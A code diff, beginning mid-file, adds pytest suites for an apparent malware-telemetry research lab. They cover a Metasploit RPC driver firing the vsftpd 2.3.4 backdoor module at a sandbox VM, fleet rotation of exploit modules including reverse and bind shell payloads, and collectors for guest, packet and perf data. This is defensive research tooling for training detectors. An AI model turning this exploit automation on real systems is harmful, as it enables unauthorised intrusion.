sessions_after_fire={1: {"type": "shell"}},
)
driver.setup()
driver.set_phase("armed")
driver.set_phase("armed")
fire_calls = [c for c in client.calls if c[0] == "module_execute"]
assert len(fire_calls) == 1
def test_teardown_kills_session_and_logs_out() -> None:
driver, client, events = _make_driver(
sessions_after_fire={1: {"type": "shell"}},
)
driver.setup()
driver.set_phase("armed")
driver.set_phase("infecting")
driver.teardown()
assert any(c[0] == "session_stop" for c in client.calls)
assert client.logged_in is False
assert any(e[0] == "session_killed" for e in events)
# -----------------------------------------------------------------------
# Driver wired into a real EpisodeRunner — events land in events.jsonl
# -----------------------------------------------------------------------
# -----------------------------------------------------------------------
# Driver v2 — sample-profile-driven workloads
# -----------------------------------------------------------------------
def test_v2_uses_profile_workload_for_cpu_saturate() -> None:
"""When constructed with a Sample, the driver should send the
profile's start_cmd at infected_running rather than the v1
yes-loop. The actual command body is owned by exploits.workloads
and tested there; here we just confirm dispatch."""
from samples.manifest import Sample as _Sample
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
client = FakeMSFRpcClient(
sessions_after_fire={1: {"type": "shell", "tunnel_peer": "x:21"}},
)
events: list[tuple[str, dict]] = []
sample = _Sample(
name="xmrig-cryptominer",
family="XMRig",
category="cryptominer",
profile="cpu-saturate",
)
driver = MSFExploitDriver(
client=client, # type: ignore[arg-type]
module=cfg,
cfg=DriverConfig(target_ip="10.200.0.10", session_open_timeout_s=0.5),
emit_event=lambda ev, **kw: events.append((ev, kw)),
sample=sample,
)
driver.setup()
driver.set_phase("armed")
driver.set_phase("infecting")
driver.set_phase("infected_running")
driver.set_phase("dormant")
driver.teardown()
# The shell command sent at infected_running should be the
# profile's multi-line wrapper — NOT the v1 single-yes line.
starts = [w for (_, w) in client.shell_writes if "yes > /dev/null" in w and "cis490-workload" not in w]
assert starts == [], "v2 driver must not send the v1 yes-loop when a Sample is supplied"
# The driver_setup event records sample + workload metadata.
setup_events = [kw for (e, kw) in events if e == "driver_setup"]
assert setup_events
assert setup_events[0]["sample"] == "xmrig-cryptominer"
assert setup_events[0]["sample_kind"] == "mimic"
assert setup_events[0]["workload_profile"] == "cpu-saturate"
# sample_executed carries the profile name + description.
se = [kw for (e, kw) in events if e == "sample_executed"]
assert se
assert se[0]["profile"] == "cpu-saturate"
assert se[0]["sample"] == "xmrig-cryptominer"
def test_v2_distinct_workloads_per_profile() -> None:
"""Two different profiles must produce *different* shell commands.
This is the property that gives the ML model varied envelopes to
learn from."""
from exploits.workloads import all_profiles, workload_for
from samples.manifest import Sample as _Sample
profiles = all_profiles()
assert len(profiles) >= 4
seen_starts: set[str] = set()
for p in profiles:
s = _Sample(name=f"x-{p}", family="X", category="rat", profile=p)
w = workload_for(s)
assert w is not None
seen_starts.add(w.start_cmd)
# Every profile must have a distinct start_cmd.
assert len(seen_starts) == len(profiles), \
"two profiles produced the same workload — ML diversity is at risk"
def test_v2_unknown_profile_falls_back_to_cpu_saturate() -> None:
from exploits.workloads import workload_for
from samples.manifest import Sample as _Sample
s = _Sample(name="weird", family="X", category="rat", profile="not-a-real-profile")
w = workload_for(s)
assert w is not None
assert w.profile == "cpu-saturate"
def test_v1_path_still_works_when_no_sample() -> None:
"""Ensure backwards compat: a driver constructed without a sample
uses the original yes-loop workload."""
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
client = FakeMSFRpcClient(sessions_after_fire={1: {"type": "shell"}})
driver = MSFExploitDriver(
client=client, # type: ignore[arg-type]
module=cfg,
cfg=DriverConfig(target_ip="10.200.0.10", session_open_timeout_s=0.5),
emit_event=lambda *a, **kw: None,
)
driver.setup()
driver.set_phase("armed")
driver.set_phase("infecting")
driver.set_phase("infected_running")
driver.teardown()
assert any("yes > /dev/null" in w for (_, w) in client.shell_writes)
def test_driver_events_persist_to_events_jsonl(tmp_path: Path) -> None:
"""When the driver is connected to a real EpisodeRunner, the
events it emits must show up in the episode's events.jsonl with
monotonic-clock timestamps (so labels and exploit events can be
correlated downstream)."""
import os
from orchestrator.episode import EpisodeConfig, EpisodeRunner
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
client = FakeMSFRpcClient(
sessions_after_fire={1: {"type": "shell", "tunnel_peer": "x:21"}},
)
schedule = [
("clean", 0.05),
("armed", 0.05),
("infecting", 0.05),
("infected_running", 0.05),
("dormant", 0.05),
("clean", 0.05),
]
ec = EpisodeConfig(
target_pid=os.getpid(),
duration_s=sum(d for _, d in schedule),
interval_ms=20,
data_root=tmp_path,
phase_schedule=schedule,
)
runner = EpisodeRunner(ec)
driver = MSFExploitDriver(
client=client, # type: ignore[arg-type]
module=cfg,
cfg=DriverConfig(target_ip="10.200.0.10", session_open_timeout_s=0.5),
emit_event=runner.emit_event,
)
runner.on_phase = driver.set_phase
driver.setup()
try:
result = runner.run()
finally:
driver.teardown()
events = [
json.loads(l)
for l in (result.episode_dir / "events.jsonl").read_text().splitlines()
]
names = [e["event"] for e in events]
assert "snapshot_load" in names
assert "driver_setup" in names
assert "exploit_fire" in names
assert "session_open" in names
assert "sample_executed" in names
assert "session_dormant" in names
assert "episode_end" in names
# Driver events must carry monotonic timestamps in episode-relative
# order (snapshot_load is essentially at origin, exploit_fire later,
# session_open later still, episode_end last).
by_name = {e["event"]: e for e in events}
assert by_name["snapshot_load"]["t_mono_ns"] < 1_000_000 # <1ms after origin
assert by_name["exploit_fire"]["t_mono_ns"] > by_name["snapshot_load"]["t_mono_ns"]
assert by_name["session_open"]["t_mono_ns"] >= by_name["exploit_fire"]["t_mono_ns"]
assert by_name["episode_end"]["t_mono_ns"] >= by_name["session_open"]["t_mono_ns"]

392
tests/test_fleet.py Normal file
View file

@ -0,0 +1,392 @@
"""Tests for fleet capacity calculation + sample manifest selection.
Capacity is unit-tested via deterministic monkeypatching of /proc and
os.cpu_count so the math is exercised independently of the host
running the suite. Sample selection has its own tests covering the
"different hosts pick different samples" property.
"""
from __future__ import annotations
from pathlib import Path
import pytest
from orchestrator import fleet
from samples.manifest import Sample, SampleManifest
REPO_ROOT = Path(__file__).resolve().parent.parent
# ---------------------------------------------------------------------------
# Capacity
# ---------------------------------------------------------------------------
def _patch_capacity_inputs(
monkeypatch,
*,
cores: int,
ram_total_mib: int,
ram_available_mib: int,
load_1m: float = 0.0,
) -> None:
monkeypatch.setattr(fleet.os, "cpu_count", lambda: cores)
monkeypatch.setattr(
fleet, "_read_meminfo",
lambda: {
"MemTotal": ram_total_mib * 1024 * 1024,
"MemAvailable": ram_available_mib * 1024 * 1024,
},
)
monkeypatch.setattr(fleet, "_read_loadavg", lambda: load_1m)
def test_capacity_8core_idle_box(monkeypatch) -> None:
_patch_capacity_inputs(monkeypatch, cores=8, ram_total_mib=16384, ram_available_mib=14000)
c = fleet.detect_capacity(ram_per_vm_mib=320)
assert c.cores_total == 8
assert c.cores_reserved == 1 # 8 // 8 = 1
assert c.max_by_cores == 7
# Plenty of RAM, idle → cores binding.
assert c.max_concurrent == 7
assert "binding=cores" in c.rationale
def test_capacity_low_ram_caps_below_cores(monkeypatch) -> None:
# 8 cores but only ~2 GiB free → ram caps below cores.
_patch_capacity_inputs(monkeypatch, cores=8, ram_total_mib=4096, ram_available_mib=2048)
c = fleet.detect_capacity(ram_per_vm_mib=320)
# headroom = max(1024, 4096//8) = 1024
# max_by_ram = (2048 - 1024) // 320 = 3
assert c.max_by_ram == 3
assert c.max_concurrent == 3
def test_capacity_high_load_halves_concurrency(monkeypatch) -> None:
# 8 cores, plenty of RAM, but load_1m / cores > 0.75
_patch_capacity_inputs(
monkeypatch, cores=8, ram_total_mib=16384, ram_available_mib=14000,
load_1m=7.0, # 7/8 = 0.875 > 0.75
)
c = fleet.detect_capacity(ram_per_vm_mib=320)
# max_by_cores = 7; max_by_load = max(1, 7//2) = 3
assert c.max_by_load == 3
assert c.max_concurrent == 3
def test_capacity_pi5_class(monkeypatch) -> None:
"""4 cores + 8 GiB → reserve 1 core, run 3 concurrent."""
_patch_capacity_inputs(monkeypatch, cores=4, ram_total_mib=7951, ram_available_mib=5223)
c = fleet.detect_capacity(ram_per_vm_mib=320)
assert c.cores_total == 4
assert c.max_concurrent == 3
def test_capacity_minimal_box(monkeypatch) -> None:
"""1-core 1 GiB host shouldn't try to run any VMs."""
_patch_capacity_inputs(monkeypatch, cores=1, ram_total_mib=1024, ram_available_mib=512)
c = fleet.detect_capacity(ram_per_vm_mib=320)
assert c.max_concurrent == 0
def test_capacity_to_dict_round_trips(monkeypatch) -> None:
_patch_capacity_inputs(monkeypatch, cores=4, ram_total_mib=8000, ram_available_mib=6000)
c = fleet.detect_capacity(ram_per_vm_mib=320)
d = c.to_dict()
assert d["cores_total"] == 4
assert d["max_concurrent"] == c.max_concurrent
assert "rationale" in d
# ---------------------------------------------------------------------------
# Sample manifest
# ---------------------------------------------------------------------------
def test_repo_manifest_loads() -> None:
m = SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml")
assert len(m) >= 4
# Every entry has required fields.
for s in m.samples:
assert s.name and s.family and s.category and s.profile
# All "mimic" today; will switch as real samples are added.
assert all(s.kind == "mimic" for s in m.samples)
def test_selection_is_deterministic() -> None:
m = SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml")
a = m.select(host_id="lab-1", slot=2, episode_index=5)
b = m.select(host_id="lab-1", slot=2, episode_index=5)
assert a is b
def test_selection_differs_across_hosts() -> None:
"""Two hosts on the same slot/episode should generally hit
different samples (probabilistic assert distribution, not
individual equality).
"""
m = SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml")
if len(m) < 2:
pytest.skip("manifest too small for diversity check")
matches = 0
for slot in range(20):
a = m.select(host_id="alice", slot=slot, episode_index=0)
b = m.select(host_id="bob", slot=slot, episode_index=0)
if a is b:
matches += 1
# If the catalog has N samples, naive collision rate ~1/N. With
# 20 trials and N≥4 we expect ~5 matches; allow up to half.
assert matches < 15, "host_id seed isn't producing variety"
def test_selection_walks_catalog_across_episodes() -> None:
"""A single host over many episodes should hit every sample at
least once."""
m = SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml")
seen = set()
for ep in range(200):
seen.add(m.select(host_id="lab-x", slot=0, episode_index=ep).name)
assert len(seen) == len(m), f"only saw {len(seen)}/{len(m)} samples"
def test_manifest_rejects_missing_required_field(tmp_path: Path) -> None:
p = tmp_path / "bad.toml"
p.write_text(
'[[sample]]\n'
'name = "x"\n'
'family = "y"\n'
'# missing category\n'
'profile = "z"\n'
)
with pytest.raises(ValueError, match="category"):
SampleManifest.load(p)
def test_manifest_rejects_unknown_category(tmp_path: Path) -> None:
p = tmp_path / "bad.toml"
p.write_text(
'[[sample]]\n'
'name = "x"\n'
'family = "y"\n'
'category = "fish"\n'
'profile = "z"\n'
)
with pytest.raises(ValueError, match="category"):
SampleManifest.load(p)
def test_manifest_rejects_duplicate_names(tmp_path: Path) -> None:
p = tmp_path / "dup.toml"
p.write_text(
'[[sample]]\n'
'name = "x"\nfamily = "y"\ncategory = "rat"\nprofile = "z"\n'
'\n[[sample]]\n'
'name = "x"\nfamily = "y"\ncategory = "rat"\nprofile = "z"\n'
)
with pytest.raises(ValueError, match="duplicate"):
SampleManifest.load(p)
# ---------------------------------------------------------------------------
# Fleet dispatch — Tier 3 vs Tier 2 selection + per-slot module rotation
# ---------------------------------------------------------------------------
class _RecordingPopen:
"""Replacement for subprocess.run that just records what it would
have invoked. Returns a returncode-0 result."""
calls: list[dict] = []
def __init__(self, args, **kwargs) -> None:
# Mimic CompletedProcess shape.
type(self).calls.append({"args": args, "env": kwargs.get("env"), "cwd": kwargs.get("cwd")})
self.returncode = 0
self.stdout = b""
self.stderr = b""
def _fleet_cfg_with_modules(tmp_path: Path, *, force_tier2: bool = False):
from exploits.modules import load_module_configs
from orchestrator import fleet
from samples.manifest import SampleManifest
repo_root = REPO_ROOT
return fleet.FleetConfig(
host_id="test-host",
repo_root=repo_root,
data_root=tmp_path,
manifest=SampleManifest.load(repo_root / "samples" / "manifest.toml"),
modules=load_module_configs(repo_root / "exploits" / "modules"),
force_tier2=force_tier2,
)
def _patch_subprocess(monkeypatch):
from orchestrator import fleet
_RecordingPopen.calls = []
monkeypatch.setattr(fleet.subprocess, "run", _RecordingPopen)
def test_fleet_dispatches_to_tier3_when_msfrpcd_listening(monkeypatch, tmp_path) -> None:
from orchestrator import fleet
cfg = _fleet_cfg_with_modules(tmp_path)
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
_patch_subprocess(monkeypatch)
capacity = fleet.detect_capacity()
sample = cfg.manifest.samples[0]
res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
assert res.tier == "tier3", res
assert res.module_name in cfg.modules
cmd = _RecordingPopen.calls[-1]["args"]
# The Tier-3 runner is what gets invoked.
assert any("run_tier3_demo.py" in str(a) for a in cmd)
# The module name is plumbed through.
assert "--module" in cmd
assert res.module_name in cmd
def test_fleet_falls_back_to_tier2_when_msfrpcd_down(monkeypatch, tmp_path) -> None:
from orchestrator import fleet
cfg = _fleet_cfg_with_modules(tmp_path)
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: False)
_patch_subprocess(monkeypatch)
capacity = fleet.detect_capacity()
sample = cfg.manifest.samples[0]
res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
assert res.tier == "tier2"
assert res.module_name is None
cmd = _RecordingPopen.calls[-1]["args"]
assert any("run_real_vm_demo.py" in str(a) for a in cmd)
def test_fleet_falls_back_to_tier2_when_module_catalog_empty(monkeypatch, tmp_path) -> None:
from orchestrator import fleet
from samples.manifest import SampleManifest
cfg = fleet.FleetConfig(
host_id="test-host",
repo_root=REPO_ROOT,
data_root=tmp_path,
manifest=SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml"),
modules={}, # explicitly empty
)
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
_patch_subprocess(monkeypatch)
capacity = fleet.detect_capacity()
sample = cfg.manifest.samples[0]
res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
assert res.tier == "tier2"
def test_fleet_force_tier2_overrides_msfrpcd(monkeypatch, tmp_path) -> None:
from orchestrator import fleet
cfg = _fleet_cfg_with_modules(tmp_path, force_tier2=True)
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
_patch_subprocess(monkeypatch)
capacity = fleet.detect_capacity()
sample = cfg.manifest.samples[0]
res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
assert res.tier == "tier2"
def test_fleet_skips_requires_bridge_modules_when_no_bridge(monkeypatch, tmp_path) -> None:
"""Fleet must filter out callback-payload modules when BRIDGE is
unset otherwise the exploit fires but the session never lands
and the episode degenerates to a 30 s session_open_timeout."""
from orchestrator import fleet
cfg = _fleet_cfg_with_modules(tmp_path)
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
monkeypatch.delenv("BRIDGE", raising=False)
_patch_subprocess(monkeypatch)
capacity = fleet.detect_capacity()
sample = cfg.manifest.samples[0]
seen_modules = set()
for ep in range(20):
res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=ep, capacity=capacity)
if res.tier == "tier3" and res.module_name:
seen_modules.add(res.module_name)
# Every selected module must be callback-free (same-socket).
callback_modules = {
m.name for m in cfg.modules.values() if m.requires_bridge
}
assert callback_modules, "test setup error: expected some require_bridge modules"
assert not (seen_modules & callback_modules), \
f"selected callback modules without BRIDGE: {seen_modules & callback_modules}"
def test_fleet_uses_all_modules_when_bridge_set(monkeypatch, tmp_path) -> None:
"""With BRIDGE set, the full catalog (including reverse/bind shell
payloads) is in rotation."""
from orchestrator import fleet
cfg = _fleet_cfg_with_modules(tmp_path)
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
monkeypatch.setenv("BRIDGE", "br-malware")
_patch_subprocess(monkeypatch)
capacity = fleet.detect_capacity()
sample = cfg.manifest.samples[0]
seen = set()
for ep in range(40):
res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=ep, capacity=capacity)
if res.tier == "tier3" and res.module_name:
seen.add(res.module_name)
assert seen == set(cfg.modules.keys()), \
f"only saw {seen}/{set(cfg.modules.keys())}"
def test_fleet_propagates_bridge_env_to_runner(monkeypatch, tmp_path) -> None:
"""When BRIDGE is set in the parent env, the per-slot subprocess
env must carry it through so launch_target.sh enters tap+bridge mode."""
from orchestrator import fleet
cfg = _fleet_cfg_with_modules(tmp_path)
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
monkeypatch.setenv("BRIDGE", "br-malware")
_patch_subprocess(monkeypatch)
capacity = fleet.detect_capacity()
sample = cfg.manifest.samples[0]
fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
assert _RecordingPopen.calls[-1]["env"]["BRIDGE"] == "br-malware"
def test_fleet_assigns_unique_port_base_per_slot(monkeypatch, tmp_path) -> None:
"""Concurrent Tier-3 slots can't share the host-side hostfwd port
or all targets stomp on each other's vsftpd:21 → 21 mapping. The
fleet must shift PORT_BASE per slot."""
from orchestrator import fleet
cfg = _fleet_cfg_with_modules(tmp_path)
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
_patch_subprocess(monkeypatch)
capacity = fleet.detect_capacity()
sample = cfg.manifest.samples[0]
fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
fleet._run_slot(cfg, slot=1, sample=sample, episode_index=0, capacity=capacity)
fleet._run_slot(cfg, slot=2, sample=sample, episode_index=0, capacity=capacity)
port_bases = [c["env"]["PORT_BASE"] for c in _RecordingPopen.calls]
assert len(set(port_bases)) == len(port_bases), \
f"PORT_BASE collision across slots: {port_bases}"
def test_manifest_marks_real_when_sha256_present(tmp_path: Path) -> None:
p = tmp_path / "real.toml"
p.write_text(
'[[sample]]\n'
'name = "real-one"\nfamily = "y"\ncategory = "rat"\nprofile = "z"\n'
'sha256 = "abc123"\n'
'\n[[sample]]\n'
'name = "mimic-one"\nfamily = "y"\ncategory = "rat"\nprofile = "z"\n'
)
m = SampleManifest.load(p)
by_name = {s.name: s for s in m.samples}
assert by_name["real-one"].kind == "real"
assert by_name["mimic-one"].kind == "mimic"

152
tests/test_guest_agent.py Normal file
View file

@ -0,0 +1,152 @@
"""Tests for the host-side guest-agent collector.
We simulate the in-guest agent by spinning up a unix socket server
(stand-in for the QEMU virtio-serial chardev) that writes a few
JSON-lines rows. The collector should read them, re-stamp with the
host's monotonic clock, and persist to telemetry-guest.jsonl.
"""
from __future__ import annotations
import json
import socket
import threading
import time
from pathlib import Path
import pytest
from collectors import guest_agent
class FakeAgentServer(threading.Thread):
def __init__(self, sock_path: Path, rows: list[dict], delay_s: float = 0.05) -> None:
super().__init__(daemon=True)
self.sock_path = sock_path
self.rows = rows
self.delay_s = delay_s
self._sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self._sock.bind(str(sock_path))
self._sock.listen(1)
self._sock.settimeout(5.0)
def run(self) -> None:
try:
conn, _ = self._sock.accept()
except socket.timeout:
return
try:
for row in self.rows:
conn.sendall((json.dumps(row) + "\n").encode())
time.sleep(self.delay_s)
time.sleep(0.1)
finally:
conn.close()
self._sock.close()
def test_collector_reads_jsonl_and_restamps(tmp_path: Path) -> None:
sock_path = tmp_path / "agent.sock"
rows_in = [
{
"t_guest_mono_ns": 1, "t_guest_wall_ns": 2,
"source": "guest_agent", "available_in_deployment": True,
"mem_total_bytes": 256 * 1024 * 1024,
"mem_available_bytes": 200 * 1024 * 1024,
"load_1m_5m_15m": [0.1, 0.05, 0.0],
"cpu_total_jiffies": {"user": 10, "system": 5, "idle": 1000},
},
{
"t_guest_mono_ns": 100_000_000, "t_guest_wall_ns": 100_000_002,
"source": "guest_agent", "available_in_deployment": True,
"mem_total_bytes": 256 * 1024 * 1024,
"mem_available_bytes": 198 * 1024 * 1024,
},
]
server = FakeAgentServer(sock_path, rows_in, delay_s=0.02)
server.start()
out_path = tmp_path / "telemetry-guest.jsonl"
stop = threading.Event()
def stop_after(ms: int) -> None:
time.sleep(ms / 1000.0)
stop.set()
threading.Thread(target=stop_after, args=(300,), daemon=True).start()
rows_written = guest_agent.run_loop(
socket_path=sock_path,
output_path=out_path,
t_mono_origin_ns=time.monotonic_ns(),
stop_event=stop,
connect_timeout_s=2.0,
)
server.join(timeout=2)
assert rows_written == 2
persisted = [json.loads(l) for l in out_path.read_text().splitlines()]
assert len(persisted) == 2
for orig, got in zip(rows_in, persisted):
# Original guest timestamps preserved.
assert got["t_guest_mono_ns"] == orig["t_guest_mono_ns"]
# Host-clock fields added.
assert "t_mono_ns" in got
assert "t_wall_ns" in got
assert got["source"] == "guest_agent"
assert got["available_in_deployment"] is True
def test_collector_returns_zero_when_socket_missing(tmp_path: Path) -> None:
rows = guest_agent.run_loop(
socket_path=tmp_path / "no-socket-here.sock",
output_path=tmp_path / "out.jsonl",
t_mono_origin_ns=time.monotonic_ns(),
stop_event=threading.Event(),
connect_timeout_s=0.5,
)
assert rows == 0
def test_collector_drops_malformed_lines_but_keeps_going(tmp_path: Path) -> None:
sock_path = tmp_path / "agent.sock"
# Will be sent verbatim; the malformed line should be skipped.
payload = (
b'{"source":"guest_agent","mem_total_bytes":1}\n'
b'this-is-not-json\n'
b'{"source":"guest_agent","mem_total_bytes":2}\n'
)
class Server(threading.Thread):
def __init__(self) -> None:
super().__init__(daemon=True)
self._sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self._sock.bind(str(sock_path))
self._sock.listen(1)
def run(self) -> None:
conn, _ = self._sock.accept()
try:
conn.sendall(payload)
time.sleep(0.2)
finally:
conn.close()
self._sock.close()
s = Server()
s.start()
out_path = tmp_path / "out.jsonl"
stop = threading.Event()
threading.Thread(
target=lambda: (time.sleep(0.4), stop.set()), daemon=True
).start()
rows = guest_agent.run_loop(
socket_path=sock_path,
output_path=out_path,
t_mono_origin_ns=time.monotonic_ns(),
stop_event=stop,
connect_timeout_s=2.0,
)
s.join(timeout=2)
assert rows == 2
persisted = [json.loads(l) for l in out_path.read_text().splitlines()]
assert [r["mem_total_bytes"] for r in persisted] == [1, 2]

188
tests/test_pcap.py Normal file
View file

@ -0,0 +1,188 @@
"""Tests for the pcap collector's pure-Python parser + bucketizer.
We synthesize a tiny pcap file in memory (Ethernet + IPv4 + TCP/UDP
records with controlled timestamps), feed it to ``bucketize()``, and
verify the produced netflow.jsonl rows are correct.
"""
from __future__ import annotations
import json
import struct
from pathlib import Path
import pytest
from collectors import pcap
# ---------------------------------------------------------------------------
# pcap synthesis helpers
# ---------------------------------------------------------------------------
_PCAP_GLOBAL_HDR = struct.pack(
"<IHHiIII",
0xa1b2c3d4, # magic (us)
2, 4, # version
0, # thiszone
0, # sigfigs
65535, # snaplen
1, # linktype = LINKTYPE_ETHERNET
)
def _ipv4(src: str, dst: str, proto: int, payload: bytes) -> bytes:
s = bytes(int(x) for x in src.split("."))
d = bytes(int(x) for x in dst.split("."))
total_len = 20 + len(payload)
return struct.pack(
">BBHHHBBHII"[:0] + "BBHHHBBH",
0x45, # version=4, IHL=5
0, # tos
total_len,
0, 0, 64, proto,
0, # checksum (don't care)
) + s + d + payload
def _tcp(sport: int, dport: int, flags: int) -> bytes:
# Minimal 20-byte TCP header: sport, dport, seq, ack, off+flags, win, csum, urg
return struct.pack(">HHIIBBHHH",
sport, dport,
0, 0,
0x50, # data offset = 5 (no options)
flags,
0, 0, 0)
def _udp(sport: int, dport: int, length: int = 8) -> bytes:
return struct.pack(">HHHH", sport, dport, length, 0)
def _ether(payload: bytes, ethertype: int = 0x0800) -> bytes:
return b"\x02\x00\x00\x00\x00\x01" + b"\x02\x00\x00\x00\x00\x02" + struct.pack(">H", ethertype) + payload
def _record(ts_ns: int, frame: bytes) -> bytes:
sec = ts_ns // 1_000_000_000
usec = (ts_ns // 1000) % 1_000_000
return struct.pack("<IIII", sec, usec, len(frame), len(frame)) + frame
def _build_pcap(records: list[tuple[int, bytes]]) -> bytes:
out = bytearray(_PCAP_GLOBAL_HDR)
for ts, frame in records:
out += _record(ts, frame)
return bytes(out)
def _write_pcap(path: Path, records: list[tuple[int, bytes]]) -> None:
path.write_bytes(_build_pcap(records))
# ---------------------------------------------------------------------------
# Tests
# ---------------------------------------------------------------------------
def test_iter_pcap_reads_records_back(tmp_path: Path) -> None:
p = tmp_path / "a.pcap"
frame = _ether(_ipv4("10.200.0.1", "10.200.0.10", 6, _tcp(40000, 21, flags=0x02)))
_write_pcap(p, [(1_000_000_000, frame)])
records = list(pcap._iter_pcap(p))
assert len(records) == 1
t_ns, data = records[0]
assert t_ns == 1_000_000_000
assert data == frame
def test_decode_tcp_syn() -> None:
f = _ether(_ipv4("10.200.0.1", "10.200.0.10", 6, _tcp(40000, 21, flags=0x02)))
d = pcap._decode(f)
assert d["ethertype"] == 0x0800
assert d["ip_proto"] == 6
assert d["src_ip"] == "10.200.0.1"
assert d["dst_ip"] == "10.200.0.10"
assert d["src_port"] == 40000
assert d["dst_port"] == 21
assert d["tcp_flags"] & 0x02
def test_decode_udp_dns_query() -> None:
f = _ether(_ipv4("10.200.0.10", "10.200.0.1", 17, _udp(33333, 53)))
d = pcap._decode(f)
assert d["ip_proto"] == 17
assert d["dst_port"] == 53
def test_bucketize_collapses_per_window(tmp_path: Path) -> None:
pcap_path = tmp_path / "ep.pcap"
netflow_path = tmp_path / "netflow.jsonl"
bridge_ip = "10.200.0.1"
guest_ip = "10.200.0.10"
base_ns = 1_700_000_000_000_000_000 # arbitrary, aligned-friendly
records = [
# Bucket A (0..100ms)
(base_ns + 5_000_000,
_ether(_ipv4(guest_ip, bridge_ip, 6, _tcp(40000, 21, flags=0x02)))),
(base_ns + 9_000_000,
_ether(_ipv4(bridge_ip, guest_ip, 6, _tcp(21, 40000, flags=0x12)))),
# Bucket B (100..200ms): UDP DNS query
(base_ns + 105_000_000,
_ether(_ipv4(guest_ip, bridge_ip, 17, _udp(33333, 53)))),
# Bucket B: TCP RST
(base_ns + 199_000_000,
_ether(_ipv4(bridge_ip, guest_ip, 6, _tcp(21, 40000, flags=0x04)))),
]
_write_pcap(pcap_path, records)
rows_written = pcap.bucketize(
pcap_path, netflow_path,
bucket_ms=100,
t_mono_origin_ns=base_ns,
bridge_ip=bridge_ip,
)
assert rows_written == 2
rows = [json.loads(l) for l in netflow_path.read_text().splitlines()]
a, b = rows
assert a["bucket_ms"] == 100
# Bucket A: 1 in (SYN), 1 out (SYN-ACK)
assert a["pkts_in"] == 1
assert a["pkts_out"] == 1
assert a["syn_count"] == 2
assert a["tcp_new_flows"] == 1 # only the bare SYN counts as new flow
assert a["dns_query_count"] == 0
assert a["unique_dst_ips"] == 2
# Bucket B: DNS + RST
assert b["dns_query_count"] == 1
assert b["rst_count"] == 1
def test_bucketize_returns_zero_for_missing_file(tmp_path: Path) -> None:
rows = pcap.bucketize(
tmp_path / "nope.pcap",
tmp_path / "netflow.jsonl",
bucket_ms=100,
t_mono_origin_ns=0,
)
assert rows == 0
def test_bucketize_handles_unknown_ethertype(tmp_path: Path) -> None:
p = tmp_path / "x.pcap"
netflow = tmp_path / "n.jsonl"
# ARP frame (ethertype 0x0806) — counted but not decoded.
f = _ether(b"\x00" * 28, ethertype=0x0806)
_write_pcap(p, [(1_000_000_000, f)])
rows = pcap.bucketize(p, netflow, bucket_ms=100, t_mono_origin_ns=0)
assert rows == 1
out = json.loads(netflow.read_text().splitlines()[0])
# No IP info, but byte/packet count survives.
assert out["pkts_in"] + out["pkts_out"] == 1
assert out["tcp_count"] == 0

82
tests/test_perf_qemu.py Normal file
View file

@ -0,0 +1,82 @@
"""Tests for the perf-stat collector — parser logic in isolation
(no actual perf invocation, since perf needs CAP_SYS_ADMIN and
hardware counters that the test runner can't assume)."""
from __future__ import annotations
import json
from pathlib import Path
import pytest
from collectors import perf_qemu
def test_parse_event_line_extracts_fields() -> None:
line = '{"interval":0.100123,"counter-value":"1234567","unit":"","event":"cycles"}'
evt = perf_qemu.parse_perf_event_line(line)
assert evt is not None
assert evt["event"] == "cycles"
assert evt["interval"] == 0.100123
assert evt["counter-value"] == "1234567"
def test_parse_event_line_skips_non_json() -> None:
assert perf_qemu.parse_perf_event_line("") is None
assert perf_qemu.parse_perf_event_line("garbage") is None
assert perf_qemu.parse_perf_event_line("# Performance counter stats") is None
def test_coerce_int_handles_perf_quirks() -> None:
assert perf_qemu._coerce_int("1234567") == 1234567
assert perf_qemu._coerce_int("1,234,567") == 1234567
assert perf_qemu._coerce_int("<not counted>") is None
assert perf_qemu._coerce_int("<not supported>") is None
assert perf_qemu._coerce_int("") is None
assert perf_qemu._coerce_int(None) is None
assert perf_qemu._coerce_int(42) == 42
def test_build_row_computes_ipc_and_miss_rate() -> None:
agg = {
"cycles": 1_000_000_000,
"instructions": 660_000_000,
"cache-references": 1_000_000,
"cache-misses": 50_000,
"branches": 100_000_000,
"branch-misses": 5_000_000,
"page-faults": 12,
"context-switches": 20,
}
row = perf_qemu._build_row(t_mono_origin_ns=0, interval_s=0.1, agg=agg)
assert row["source"] == "host_perf"
assert row["available_in_deployment"] is False
assert row["cycles"] == 1_000_000_000
assert row["instructions"] == 660_000_000
assert pytest.approx(row["ipc"], abs=1e-9) == 0.66
assert pytest.approx(row["cache_miss_rate"], abs=1e-9) == 0.05
assert row["interval_s"] == 0.1
def test_build_row_handles_missing_counters() -> None:
"""If perf can't enable cache-misses on this hardware, the row
should still be valid just with None for the missing fields."""
agg = {"cycles": 100, "instructions": 50}
row = perf_qemu._build_row(t_mono_origin_ns=0, interval_s=0.1, agg=agg)
assert row["cycles"] == 100
